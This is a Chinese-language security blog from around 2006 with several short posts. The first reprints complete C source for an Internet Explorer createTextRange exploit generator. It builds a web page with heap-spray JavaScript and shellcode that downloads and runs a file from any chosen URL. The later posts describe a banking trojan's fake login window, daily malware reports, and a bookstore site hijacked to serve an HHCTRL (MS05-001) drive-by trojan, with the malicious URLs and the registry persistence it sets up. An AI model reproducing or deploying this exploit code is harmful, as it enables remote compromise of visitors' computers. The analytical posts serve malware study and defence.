戴硕的blog
IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存,总得来说,可以远程代码执行,自然是严重等级的漏洞,但利用起来代价很大,512M内存的机器上跑的话,也需要1~2分钟才会运行shellcode,所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。
在这里,转载一个利用createTextRange漏洞的文件下载木马生成器的源码,供从事系统安全的朋友们娱乐。其实,大家可能早就baidu到一些了,呵呵。
/* * * Internet Explorer "createTextRang" Download Shellcoded Exploit * Bug discovered by Computer Terrorism (UK) * http://www.computerterrorism.com/research/ct22-03-2006 * Reliable exploitation by Darkeagle of Unl0ck Research Team * http://www.milw0rm.com/exploits/1606 * * Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 * Severity: Critical * Impact: Remote System Access * Solution Status: Unpatched * * E-Mail: atmaca@icqmail.com * Web: http://www.spyinstructors.com,http://www.atmacasoft.com * Credit to Kozan,Darkeagle,delikon,Stelian Ene * */ #include <windows.h> #include <stdio.h> #define BUF_LEN 0x1518 #define FILE_NAME "index.htm" char body1[] = "<input type=\"checkbox\" id=\"blah\">\r\n" "<SCRIPT language=\"javascript\">\r\n\r\n" "shellcode = unescape(\r\n" "\t\"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\" +\r\n" "\t\"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\" +\r\n" "\t\"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\" +\r\n" "\t\"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\" +\r\n" "\t\"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\" +\r\n" "\t\"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\" +\r\n" "\t\"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\" +\r\n" "\t\"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\" +\r\n" "\t\"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\" +\r\n" "\t\"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\" +\r\n" "\t\"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\" +\r\n" "\t\"%u0065"; char body2[] = "\r\n\r\nbigblock = unescape(\"%u9090%u9090\");\r\n" "slackspace = 20 + shellcode.length\r\n\r\n" "while (bigblock.length < slackspace)\r\n" "\tbigblock += bigblock;\r\n\r\n" "fillblock = bigblock.substring(0, slackspace);\r\n\r\n" "block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n" "while(block.length + slackspace < 0x40000)\r\n" "\tblock = block + block + fillblock;\r\n\r\n" "memory = new Array();\r\n\r\n" "for ( i = 0; i < 2020; i++ )\r\n" "\tmemory[i] = block + shellcode;\r\n\r\n" "var r = document.getElementById('blah').createTextRange();\r\n\r\n" "</script>\r\n"; int main(int argc,char *argv[]) { if (argc < 2) { printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit"); printf("\nUsage:\n"); printf(" ie_exp <WebUrl>\n"); return 0; } FILE *File; char *pszBuffer; char *web = argv[1]; char *pu = "%u"; char u_t[5]; char *utf16 = (char*)malloc(strlen(web)*5); if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszBuffer = (char*)malloc(BUF_LEN); memcpy(pszBuffer,body1,sizeof(body1)-1); memset(utf16,'\0',strlen(web)*5); for (unsigned int i=0;i<strlen(web);i=i+2) { sprintf(u_t,"%s%.2x%.2x", pu, web[i+1], web[i]); strcat(utf16,u_t); } strcat(pszBuffer,utf16); strcat(pszBuffer,"%u0000\");"); strcat(pszBuffer,body2); fwrite(pszBuffer, BUF_LEN, 1,File); fclose(File); printf("\n\n" FILE_NAME " has been created in the current directory.\n"); return 1; } // milw0rm.com [2006-03-23] </body> </html>
上图是一个vb木马显示的窗口,该窗口背景图片是幅截图,就是xx网上银行的登录页面。木马监视当前用户窗口的标题文字,一旦发现用户正在使用IE浏览器登录此页面,立即关闭IE窗口,并弹出自己的虚假登录窗口,诱骗用户在木马窗口上输入卡号和密码。随即把截到的内容发送至病毒作者信箱。
昨晚上bloglines看东西,发现FrSIRT Exploit有1条更新,还以为是跟MS06-012有关的PoC代码出来了,结果却是这么一条消息:
Exploits and PoCs are available to FrSIRT VNS?/b> subscribers only.Public exploits section has been definitively closed.
FrSIRT Exploits收费了,通过它的FrSIRT Vulnerability Notification Services。
本篇文章使用aigaogao Blog软件发布, “我的Blog要备份”
昨天(2006.03.14)收到的病毒样本,总体来说,没有什么新鲜的东东。sys.exe、mssvcc.exe和lup.exe,是3个上报次数超过100的高波变种(Backdoor/Agobot),技术上和以前的变种没有什么变化,可以参考昨日病毒(2006.03.13) 。
在上报次数排行榜前3位的样本文件分别是:
~DF44.tmp.exe ---- 4891SSAddr1.dll ---- 697stup.exe ---- 568
它们不是病毒,而是腾讯soso搜索工具条的组成部件或临时文件。从上报次数来看,腾讯搜索工具条正在迅速扩展用户。目前没有证据说明腾讯强制用户安装这个工具条,想想数以亿计的QQ用户,这点上报数字也就没什么说不过去的了。
最后,谨以下图欢迎soso加入IE工具条家族。
接下来的几周要恶补CMMI了,花在病毒上面的时间会大打折扣。但我不想因此而降低blog的更新频率,相反地,要在下周开一个新系列——“昨日病毒”。
这个系列类似于病毒播报:挑选前一天感染用户数量最多的一个或几个病毒,给出分析报告。感染数据来自于江民公司的未知病毒上报系统。“昨日病毒”和我blog侧栏上的病毒播报相比,不同之处在于——我承诺“昨日病毒”的内容是真实客观的,至少我不会在今天发布“明日病毒”:)
在前几天,我曾写过病毒分析:Backdoor/Agobot.cgd及其Botnet和病毒分析:Backdoor/RBot.auv ,算是“昨日病毒”的两篇前身了。之所以在现在决定开启这个系列,也是想在接下来枯燥的CMMI工作中找些“娱乐”:s
最后,顺便说一句,蔚蓝网络书店首页的恶意代码昨天已经被删除了,大家可以放心上去买书了。
今天想买书,随手上了蔚蓝书店(http://www.welan.com),突然弹出个HTML Help窗口,这可是打了补丁的机器浏览HHCTRL恶意页面的典型特征,看了下蔚蓝首页的源码,问题出在这里:
恶意代码利用hhctrl "Related Topic"跨区脚本执行漏洞(MS05-001),下载并执行http://www.pic58.net/blue.wma。后者是个网页点击木马,会启动隐藏的IE窗口,自动访问若干色情网站。
具体分析如下:1、蔚蓝网络书店主页(http://www.welan.com)引用了恶意脚本http://www.pic58.net/rse.js
2、后者继续引用恶意网页http://www.pic58.net/mp3.htm
3、mp3.htm利用IE浏览器HHCTRL跨安全区脚本执行漏洞,自动下载并运行病毒可执行程序http://www.pic58.net/blue.wma
4、病毒程序blue.wma(Trojan/Agent.qy)运行后,将创建下列文件:%SystemDir%\ydsvqjbi.dll, 11872字节%SystemDir%\ydsvqjbi.exe, 25107字节在注册表中添加下列启动项:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
policies\Explorer\Run]"ydsvqjbi" = %SystemDir%\ydsvqjbi.exe这样,在Windows启动时,病毒就可以自动执行。
5、ydsvqjbi.exe将病毒模块ydsvqjbi.dll注入到Explorer.exe进程,ydsvqjbi.dll会在后台隐藏方式启动IE浏览器,访问下列网址:http://www.9hun.nethttp://www.9hun.net/s1.asphttp://www.9hun.net/s2.asphttp://www.taose.net/index.asphttp://www.fasao.cn/index.asp
很长时间以来,Hacker Defender一直提供明码标价的各类免杀服务,可以使rootkit躲避各类流行检测工具和杀毒软件。现在,这个免杀服务已经关闭了。按照Hacker Defender的声明,免杀服务一直都是为了催生一套功能齐备的安全方案,而并非为了赚钱,也不是支持网络犯罪;可惜至今这个目的还没有达到。特别地,它提到了BlackLight和IceSword,认为在二者结合的基础上,可以最终实现一个强大安全的解决方案。 原文在这里
现在已经是3月3日了。Email-Worm.Nyxem.e会在每个月的3号发作,删除 doc/xls/mdb/mde/ppt/pps/zip/rar/pdf/psd/dmp文件的内容。第一次发作是2月3号,今天是它的第二个发作日,大家小心。相关链接:Nyxem alert status raisedNYXEM今天发作 12小时NYXEM感染数量统计